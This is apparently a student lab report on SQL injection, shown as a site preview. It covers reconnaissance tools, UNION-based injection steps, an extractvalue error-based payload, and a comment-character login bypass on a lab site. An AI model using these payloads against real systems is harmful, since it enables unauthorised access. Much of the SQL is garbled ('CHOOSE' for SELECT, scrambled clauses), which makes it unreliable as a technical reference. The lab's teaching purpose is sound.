Lab report 5.edited
docx
keyboard_arrow_up
School
Technical University of Mombasa *
*We aren’t endorsed by this school
Course
ACH101
Subject
Information Systems
Date
Nov 24, 2024
Type
docx
Pages
9
Uploaded by CoachButterfly5975
1
SQL INJECTION ATTACKS
Student’s Name
Institutional Affiliation
Course
Instructor’s Name
Date
2
1.
Why did you use Curl and Wappalyzer™ in this lab? What else can you use for the same purpose?
Curl and Wappalyzer are employed to help one run the get method HTTP on the website
(Singh and Sharma, 2020). It thus helps to query or align the website version and its operating
system that is running. It also queries a crucial reconnaissance tool of the webserver, which in
hacking is the first step. Apart from the Curl and wappalyzer, Wget and Builtwish can be used as
their alternatives.
HTTP (s), and FTP, are easily retrieved by the software package, which is free,
and the most protocol of the Internet that is employed widely is the Wget. It is a line tool command
that is non – interactive, hence from cron jobs, scripts, X-windows support lacking terminals, and
many more. The Buildwith significantly shows webpages and Webapps. It does this in a very
categorized and concise format (Yeung,2018).
2.
Provide an example of a UNION-based SQL injection attack.
SQL injection attacks occur when malicious SQL statements are injected by an
attacker and using the backend data to retrieve information. They significantly employ the
parameter, which is highly vulnerable. In attackers involving UNION, the attacker
employs UNION SQL statements to get the data, and it forms the most popular attack. The
following is an example of the attack. One first query and the results observed one
determines how to proceed.
Query One:
CHOOSE name, characterization, cost FROM services WHERE category UNION one
CHOOSE 1 FROM data_schema. tables
RETURNED ERROR.
ORA-00854: view none existence.
While the view doesn’t exist, the step that follows involves guessing on a popularly
employed view name DBMS for trial two.
3
CHOOSE name, characterization, cost FROM services WHERE category= UNION 1
CHOOSE 1 FROM all_views
RETURNED ERROR
.
ORA-01889: incorrect results columns number in the block query.
These views have no link to the returned error, and to solve this, guessing the correct
column number is the option.
Thus, in the next step, only three columns will be queried.
CHOOSE name, characterization, cost FROM services WHERE type= BY 2 ORDER 1
OUTCOME
.
Characterization sorts the returned data.
At this point, at least two columns are kept by query conduct to identify the exact column
number.
CHOOSE name, characterization, cost FROM services WHERE id= BY4 ORDER 1
RETURNED ERROR.
ORA-01945: ORDER BY item must be a CHOOSE-list expression number.
With this, a column total is concluded to be three.
With the exact number of columns, a real query is finally made.
CHOOSE name, characterization, cost FROM services WHERE type = UNION 1
CHOOSE 'A,' 'B,' 3 FROM all view.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
4
OUTCOME.
Data is listed, and an error message is not returned.
3.
Research the Internet and discuss the best way an organization can prevent SQL injection
attacks. Describe how it works and why it is the best way.
To prevent these injection attacks, the organization should utilize bounded database
queries, which are parameterized. Also, they should use parameters that are typed, and
those procedures which are stored in the database and are parameterized should be
employed carefully.
4.
Describe the ExtractValue function syntax used in the following command:
5.
' or extractvalue (0x3a, concat (0x3a, (select database ()))) #.
In the above command, XML instance type and expression XPath have been taken
as arguments by the function EXTRACTVALUE, and the resultant node returned is a
scalar value. Results of this command must be text, attribute, element, and single node.
6.
What other function can you use besides the select database function to obtain system
information?
Benchmark (count, expr) is the first run.
For example, BENCHMARK (80, (CHOOSE * FROM test4))
(0.00 sec) set in 2 rows
In the above example, the test4 file is assumed to have only two-column and two rows.
The returned value will always be 0 client end is passed by the time that returns time, and it is
bever the CPU time on the end of the server.
5
7.
In the
urbank.com
login page, execute an SQL injection attack from the username box to
display the current user. Research your answer and provide a screenshot of your results.
Into the username, the field enters the first single quote and press enter.
6
RETURNED ERROR: TELLS US THAT THE ENTERED SINGLE QUOTE WAS
NOT FILTERED.
A query that is broken results
CHOOSE * FROM $tbl_name WHERE username= and passcode=
The next step is to input a character comment so as the broken query is fixed and enter
button is pressed.
The result returns
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
7
Fixed query results
CHOOSE * FROM $tbl_name WHERE username= #' and passcode=
This is important because the username/passcode combination must match those of the
original query entered into the database. The and passcode =, is, however, been
excluded by the character comment.
Alice# is entered, and enter key is pressed to test the above.
Bypass and login were a success
8
.
Query results.
CHOOSE * FROM $tbl_name WHERE username='Alice’ #' and passcode= “
9
References
Alternativesto (n.d ) Alternatives to cURL for all platforms with any license Retrieved from
https://alternativeto.net/software/built-with/
Patni, S. (2017).
Pro RESTful APIs
. Apress.
Singh, H., & Sharma, H. (2020).
Hands-On Web Penetration Testing with Metasploit: The subtle art
of using Metasploit 5.0 for web application exploitation
. Packt Publishing Ltd.
Strika, L (2018, Oct 7 ) How to start using Curl and why: a hands-on introduction Retrieved
from
https://www.freecodecamp.org/news/how-to-start-using-curl-and-why-a-hands-
on-introduction-
Yeung, A. (2018).
Hands-On Server-Side Web Development with Swift: Build dynamic web apps by
leveraging two popular Swift web frameworks: Vapor 3.0 and Kitura 2.5
. Packt Publishing
Ltd.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help